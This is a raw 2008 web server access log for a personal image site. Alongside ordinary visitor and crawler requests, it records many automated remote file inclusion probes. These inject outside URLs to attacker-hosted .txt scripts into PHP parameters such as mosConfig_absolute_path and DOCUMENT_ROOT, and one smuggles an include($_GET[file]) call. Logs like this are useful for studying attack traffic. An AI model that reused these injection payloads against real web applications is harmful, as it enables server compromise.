70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:33 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:42 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:42 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:42 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:42 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
58.25.217.217 - - [06/Aug/2008:19:44:48 -0500] "GET /scanhttp://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
70.238.206.197 - - [06/Aug/2008:19:45:00 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
74.50.7.240 - - [06/Aug/2008:19:46:04 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
74.50.7.240 - - [06/Aug/2008:19:46:04 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
74.50.7.240 - - [06/Aug/2008:19:46:05 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
74.50.7.240 - - [06/Aug/2008:19:46:05 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
74.50.7.240 - - [06/Aug/2008:19:46:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
74.50.7.240 - - [06/Aug/2008:19:46:23 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
74.50.7.240 - - [06/Aug/2008:19:46:33 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
74.50.7.240 - - [06/Aug/2008:19:46:33 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xcrash.altervista.org/ooid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
66.221.1.1 - - [06/Aug/2008:19:47:04 -0500] "GET /logs/access_log.1208044800&w=oneadmin+oneadmin&d=OaoDtBg5RNN-&icp=1&.intl=uk//faqsupport/samplefaqsupport.php?path[docroot]=http://dailymixedtrivia.com/s.cgi? HTTP/1.1" 404 409 "-""libwww-perl/5.65"
66.221.1.1 - - [06/Aug/2008:19:47:04 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://dailymixedtrivia.com/s.cgi? HTTP/1.1" 404 316 "-""libwww-perl/5.65"
66.221.1.1 - - [06/Aug/2008:19:47:04 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://dailymixedtrivia.com/s.cgi? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
58.25.217.217 - - [06/Aug/2008:19:49:01 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 200 53081 "-""libwww-perl/5.79"
58.25.217.217 - - [06/Aug/2008:19:49:50 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
58.25.217.217 - - [06/Aug/2008:19:49:57 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 200 36689 "-""libwww-perl/5.79"
203.56.255.14 - - [06/Aug/2008:19:50:21 -0500] "GET /logs/errors.php?error=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:19:50:22 -0500] "GET /errors.php?error=http://juegos0nline.webcindario.com/id2.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
89.111.179.10 - - [06/Aug/2008:19:50:35 -0500] "GET /logs//phpBB/admin/admin_styles.php?mode=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.111.179.10 - - [06/Aug/2008:19:50:35 -0500] "GET //phpBB/admin/admin_styles.php?mode=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.111.176.90 - - [06/Aug/2008:19:50:47 -0500] "GET /logs//phpBB/admin/admin_styles.php?mode=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.111.176.90 - - [06/Aug/2008:19:50:47 -0500] "GET //phpBB/admin/admin_styles.php?mode=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
77.221.130.6 - - [06/Aug/2008:19:51:03 -0500] "GET /logs//phpBB/admin/admin_styles.php?mode=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
77.221.130.6 - - [06/Aug/2008:19:51:04 -0500] "GET //phpBB/admin/admin_styles.php?mode=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:19:51:37 -0500] "GET /logs/access_log.1206230400//php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:19:51:37 -0500] "GET //php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:19:51:37 -0500] "GET /logs//php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:19:54:25 -0500] "GET /logs/access_log.1213315200//php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:19:54:25 -0500] "GET //php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:19:54:25 -0500] "GET /logs//php/vwar/news.php//convert/mvcw.php?step=1&vwar_root=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
74.6.18.231 - - [06/Aug/2008:19:54:34 -0500] "GET /logs/access_log.1157328000 HTTP/1.0" 200 215886 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.225.218.2 - - [06/Aug/2008:19:55:23 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:19:55:23 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:19:55:23 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:19:55:23 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
209.97.201.148 - - [06/Aug/2008:19:55:27 -0500] "GET /logs//s_browse.inc.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
209.97.201.148 - - [06/Aug/2008:19:55:27 -0500] "GET //s_browse.inc.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
212.34.140.215 - - [06/Aug/2008:19:57:54 -0500] "GET /logs///nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:19:57:54 -0500] "GET ///nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
66.225.218.2 - - [06/Aug/2008:20:04:41 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:20:04:41 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:20:04:41 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
218.38.12.93 - - [06/Aug/2008:20:05:42 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:05:43 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
210.127.253.161 - - [06/Aug/2008:20:06:08 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:06:09 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
58.25.217.217 - - [06/Aug/2008:20:06:36 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
208.115.34.17 - - [06/Aug/2008:20:07:09 -0500] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
208.115.34.17 - - [06/Aug/2008:20:07:09 -0500] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.813"
208.115.34.17 - - [06/Aug/2008:20:09:18 -0500] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.813"
208.115.34.17 - - [06/Aug/2008:20:09:19 -0500] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.813"
210.127.253.161 - - [06/Aug/2008:20:10:43 -0500] "GET /logs/errors.php?error=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:10:44 -0500] "GET /errors.php?error=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
218.38.12.93 - - [06/Aug/2008:20:11:50 -0500] "GET /logs/errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:11:50 -0500] "GET /errors.php?error=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
189.1.168.93 - - [06/Aug/2008:20:13:27 -0500] "GET /logs/access_log.1214438400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 370 "-""libwww-perl/5.810"
189.1.168.93 - - [06/Aug/2008:20:13:27 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
189.1.168.93 - - [06/Aug/2008:20:13:27 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.810"
64.22.100.83 - - [06/Aug/2008:20:13:30 -0500] "GET /logs//s_class.inc.php?DOCUMENT_ROOT=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.813"
64.22.100.83 - - [06/Aug/2008:20:13:30 -0500] "GET //s_class.inc.php?DOCUMENT_ROOT=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.813"
210.127.253.161 - - [06/Aug/2008:20:15:34 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:15:34 -0500] "GET //?path%5Bdocroot%5D=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
218.38.12.93 - - [06/Aug/2008:20:16:09 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:16:09 -0500] "GET //?path%5Bdocroot%5D=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
204.8.217.2 - - [06/Aug/2008:20:16:39 -0500] "GET /oneadmin/adminfoot.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 306 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
204.8.217.2 - - [06/Aug/2008:20:16:40 -0500] "GET /logs/oneadmin/adminfoot.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
69.94.120.198 - - [06/Aug/2008:20:17:20 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:17:39 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:17:40 -0500] "GET /phphtml.php?htmlclass_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
212.34.140.215 - - [06/Aug/2008:20:18:18 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
212.34.140.215 - - [06/Aug/2008:20:18:19 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
77.90.20.2 - - [06/Aug/2008:20:18:41 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.90.20.2 - - [06/Aug/2008:20:18:47 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
77.90.20.2 - - [06/Aug/2008:20:18:53 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.90.20.2 - - [06/Aug/2008:20:18:59 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.38.12.93 - - [06/Aug/2008:20:19:07 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:19:07 -0500] "GET /phphtml.php?htmlclass_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
87.106.191.163 - - [06/Aug/2008:20:19:25 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
87.106.191.163 - - [06/Aug/2008:20:19:25 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:19:34 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:19:35 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:19:35 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
218.38.12.93 - - [06/Aug/2008:20:20:06 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:20:07 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:20:07 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
77.90.20.2 - - [06/Aug/2008:20:22:46 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.90.20.2 - - [06/Aug/2008:20:22:52 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:23:30 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:23:31 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
204.15.10.144 - - [06/Aug/2008:20:23:33 -0500] "GET /logs/access_log.1212883200%20%20//modules/xfsection/modify.php?dir_module=http://www.dominioncentre.org/oneadmin/_files/access.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:24:39 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:24:40 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
210.127.253.161 - - [06/Aug/2008:20:24:40 -0500] "GET /logs/?sourcedir=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 200 94311 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:24:41 -0500] "GET /?sourcedir=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
218.38.12.93 - - [06/Aug/2008:20:24:54 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:24:54 -0500] "GET //?path%5Bdocroot%5D=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
218.38.12.93 - - [06/Aug/2008:20:24:56 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.strankystrednichcech.cz/r0x.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.79"
209.97.201.148 - - [06/Aug/2008:20:25:54 -0500] "GET /logs//home.php?pagina=http://sujianto.com/load.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.97.201.148 - - [06/Aug/2008:20:25:54 -0500] "GET //home.php?pagina=http://sujianto.com/load.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
58.102.118.201 - - [06/Aug/2008:20:26:25 -0500] "GET /logs/access_log.1213315200//tools/send_reminders.php?noSet=0&includedir=http://bjork.name.md/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:20:26:25 -0500] "GET /logs/access_log.1213315200//tools/send_reminders.php?noSet=0&includedir=http://bjork.name.md/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:20:26:25 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://bjork.name.md/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:20:26:25 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://bjork.name.md/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:20:26:26 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://bjork.name.md/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
58.102.118.201 - - [06/Aug/2008:20:26:26 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://bjork.name.md/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:27:09 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:27:09 -0500] "GET //?path%5Bdocroot%5D=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
210.127.253.161 - - [06/Aug/2008:20:27:14 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.objectsworld.net/dotproject//includes/r0x.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.805"
77.90.20.2 - - [06/Aug/2008:20:28:11 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.90.20.2 - - [06/Aug/2008:20:28:16 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.220.44.110 - - [06/Aug/2008:20:28:51 -0500] "GET /logs//s_class.inc.php?DOCUMENT_ROOT=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
200.220.44.110 - - [06/Aug/2008:20:28:51 -0500] "GET //s_class.inc.php?DOCUMENT_ROOT=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
203.56.255.14 - - [06/Aug/2008:20:31:02 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:20:31:02 -0500] "GET /phphtml.php?htmlclass_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:20:31:03 -0500] "GET /logs/phphtml.php?htmlclass_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
65.214.45.100 - - [06/Aug/2008:20:31:28 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
203.56.255.14 - - [06/Aug/2008:20:35:28 -0500] "GET //?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:20:35:28 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
203.56.255.14 - - [06/Aug/2008:20:35:30 -0500] "GET /logs//?path%5Bdocroot%5D=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.65"
217.20.112.119 - - [06/Aug/2008:20:35:54 -0500] "GET /logs/access_log.1207353600 HTTP/1.1" 200 216651 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4222)"
